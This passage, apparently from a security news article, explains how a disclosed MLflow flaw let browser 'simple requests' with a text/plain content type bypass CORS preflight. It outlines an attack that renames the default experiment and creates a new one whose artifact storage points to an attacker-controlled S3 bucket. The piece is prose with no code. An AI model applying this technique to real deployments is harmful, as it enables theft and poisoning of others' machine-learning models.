MLflow vulnerability enables remote machine learning model theft and poisoning
For example, if a piece of JavaScript code loaded inside a browser from domain A tries to make a request to domain B, the browser will first make a so-called preflight request to check if domain B has a CORS policy that allows scripted requests from domain A. While this applies to localhost as well, Beeton points out that there is another type of request called a simple request that is still allowed by most browsers (except Safari) that doesn’t trigger a preflight request because it predates CORS. Such requests are used, for example, by the <form> element from the HTML standard to submit data across origins but can also be triggered from JavaScript.
A simple request can be of the type GET, POST, and HEAD and can have the content type application/x-www-form-urlencoded, multipart/form-data, text/plain, or no content type. Their limitation, however, is that the script making them won’t get any response back unless the target server opts into it through the Access-Control-Allow-Origin header.
From an attack perspective, though, getting a response back is not really required as long as the intended action triggered by the request happens. This is the case for both the MLflow and Quarkus vulnerabilities.
Stealing and poisoning machine-learning models
Once MLflow is installed, its user interface is accessible by default via http://localhost:5000 and supports a REST API through which actions can be performed programmatically. Normally, API interaction would be done through POST requests with a content type of application/JSON, which is not a content type allowed for simple requests.
However, Beeton found that MLflow’s API did not check the content type of requests, allowing requests with a content type of text/plain. In turn, this allows remote cross-origin attacks through the browser via simple requests.
The API has limited functionality such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently, the default experiment in MLflow to which new data will be saved is called “Default,” so attackers can first send a request to rename it to “Old” and then create a new experiment, which will now be called “Default” but have an artifact_uri pointing to an external S3 storage bucket they control.